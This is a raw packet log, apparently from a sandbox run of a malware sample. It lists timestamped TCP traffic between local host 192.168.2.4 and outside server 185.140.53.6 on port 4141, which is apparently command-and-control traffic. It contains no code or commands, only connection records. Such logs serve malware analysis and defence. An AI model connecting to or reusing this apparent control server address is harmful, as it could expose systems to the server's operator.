Jan 24, 2022 02:25:22.684603930 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.757978916 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.758039951 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.758111954 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.758136034 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.758208036 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.758256912 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.758316994 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.795356035 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.795387030 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.795404911 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.795419931 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.795435905 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.795494080 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.795526028 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.795773029 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.795790911 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.795824051 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.795850039 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.795861959 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.797287941 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.885102987 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.885133982 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.885257959 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.885257006 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.885298967 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.885720968 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.885767937 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.889265060 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.889322996 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.889338970 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.889386892 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.889409065 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.942476034 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.942508936 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.942625046 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.943344116 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:22.949157000 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:22.969651937 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.078449011 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.078480005 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.078681946 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.078704119 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.078720093 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.078825951 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.078916073 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.078938007 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.078990936 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.079319954 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.079341888 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.079370022 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.079416990 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.079591990 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.079613924 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.079665899 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.079869986 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.079890966 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.079936981 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.080107927 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.080128908 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.080156088 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.080200911 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.080245972 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.080267906 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.080310106 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.080471039 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.080492020 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.080509901 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.080533981 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.080575943 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.083049059 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.083137989 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.172792912 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.172827005 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.172852039 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.172871113 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.172944069 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.173012018 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.173079014 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.173249006 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.173258066 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.173280001 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.173333883 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.173546076 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.173568964 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.173626900 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.173739910 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.173760891 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.173790932 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.173835993 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.174040079 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.174062967 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.174103975 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.174145937 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:23.174283981 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.174307108 CET	4141	49779	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:23.174364090 CET	49779	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:27.028796911 CET	49782	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:27.249589920 CET	4141	49782	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:27.249784946 CET	49782	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:27.268831015 CET	49782	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:27.444552898 CET	4141	49782	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:27.445712090 CET	49782	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:27.729839087 CET	4141	49782	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:27.730036974 CET	49782	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:27.840671062 CET	4141	49782	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:27.840810061 CET	49782	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:28.154706955 CET	4141	49782	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:28.158052921 CET	49782	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:28.704062939 CET	49782	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:29.219970942 CET	49782	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:29.305963993 CET	4141	49782	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:29.306085110 CET	49782	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:33.461833000 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:33.542048931 CET	4141	49788	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:33.542284966 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:33.543042898 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:33.753369093 CET	4141	49788	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:33.754316092 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:34.059695005 CET	4141	49788	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:34.059849977 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:34.149080038 CET	4141	49788	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:34.149209023 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:34.450885057 CET	4141	49788	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:34.450987101 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:34.731365919 CET	4141	49788	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:34.731472969 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:35.025798082 CET	4141	49788	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:35.025930882 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:35.501496077 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:35.517436981 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:35.666565895 CET	4141	49788	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:35.666701078 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:38.623027086 CET	4141	49788	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:38.623270988 CET	49788	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:39.628432035 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:39.717343092 CET	4141	49789	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:39.717458963 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:39.718199015 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:39.935817957 CET	4141	49789	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:39.935956001 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:40.249959946 CET	4141	49789	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:40.250103951 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:40.383790970 CET	4141	49789	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:40.385519028 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:40.650657892 CET	4141	49789	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:40.650825024 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:40.783165932 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:40.900240898 CET	4141	49789	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:41.267559052 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:41.361830950 CET	4141	49789	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:41.377373934 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:41.575577974 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:41.586541891 CET	4141	49789	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:41.586689949 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:41.692703009 CET	4141	49789	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:41.692890882 CET	49789	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:45.695050001 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:45.783374071 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:45.785537958 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:45.786163092 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:46.015438080 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:46.015578032 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:46.293109894 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:46.295397997 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:46.375190973 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:46.375391960 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:46.669471025 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:46.669588089 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:46.880568981 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:46.880659103 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:46.886986971 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:46.887051105 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:46.979294062 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:46.979366064 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.024095058 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.024198055 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.025523901 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.025542974 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.025580883 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.025616884 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.090171099 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.090193987 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.090250015 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.090289116 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.159116030 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.159156084 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.159181118 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.159230947 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.159272909 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.159392118 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.159447908 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.159465075 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.159507990 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.174258947 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.175424099 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.178138971 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.178309917 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.179996967 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.180068016 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.181437969 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.181502104 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.181610107 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.181668043 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.301291943 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.301321030 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.301378965 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.337647915 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.337668896 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.337709904 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.337724924 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.337764978 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.337956905 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.337997913 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.338033915 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.338068962 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.338151932 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.338186979 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.338272095 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.338308096 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.338371038 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.338407040 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.338552952 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.338586092 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.338674068 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.338707924 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.338793039 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.338862896 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.338882923 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.338921070 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.339032888 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.339067936 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.339153051 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.339188099 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.339272022 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.339306116 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.339392900 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.339428902 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.339512110 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.339548111 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.339673042 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.339709044 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.424812078 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.424834967 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.424850941 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.424866915 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.424895048 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.424925089 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.426990032 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.427010059 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.427077055 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.440511942 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.440566063 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.440594912 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.440598011 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.440620899 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.440660000 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.440804005 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.440840960 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.440846920 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.440886974 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.440999985 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.441036940 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.441070080 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.441122055 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.441191912 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.441230059 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.446381092 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.446412086 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.446469069 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.446598053 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.446640968 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.446710110 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.446752071 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.446798086 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.446836948 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.446892023 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.446929932 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.447069883 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.447110891 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.447269917 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.447308064 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.447309017 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.447355032 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.447472095 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.447510958 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.447554111 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.447592020 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.447634935 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.447673082 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.447791100 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.447832108 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.450012922 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.450057030 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.465192080 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.465291977 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.465317965 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.465365887 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.465519905 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.465568066 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.467041969 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.467113972 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.467118979 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.467169046 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.467319012 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.467361927 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.467372894 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.467401028 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.489871025 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.489947081 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.490240097 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.490282059 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.490325928 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.490331888 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.490386009 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.490420103 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.490452051 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.490472078 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.490494013 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.530316114 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.534418106 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.542176962 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.542499065 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.560647011 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.560664892 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.560713053 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.560770988 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.560805082 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.560854912 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.560885906 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.561003923 CET	4141	49791	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:47.561034918 CET	49791	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:47.561120987 CET	4141	49791	185.140.53.6	192.168.2.4
